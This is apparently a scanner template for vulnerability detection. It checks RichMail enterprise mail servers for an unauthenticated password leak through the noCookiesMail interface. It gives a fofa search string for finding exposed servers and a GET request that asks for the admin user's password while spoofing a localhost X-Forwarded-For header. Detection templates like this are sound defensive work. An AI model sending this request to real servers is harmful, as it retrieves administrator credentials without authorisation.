id: richmail-infoleak 

info:
  name: RichMail Password InfoLeak
  author: rj
  severity: high
  verified: true
  description: |
    RickMail noCookiesMail 接口存在信息泄露漏洞。
    fofa: "Richmail 企业邮箱"
    
rules:
  r0:
    request:
      method: GET
      path: /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
      header:
        X-Forwarded-For: 127.0.0.1
    expression: response.status == 200 && response.body.bcontains(b'S_OK')
expression: r0()
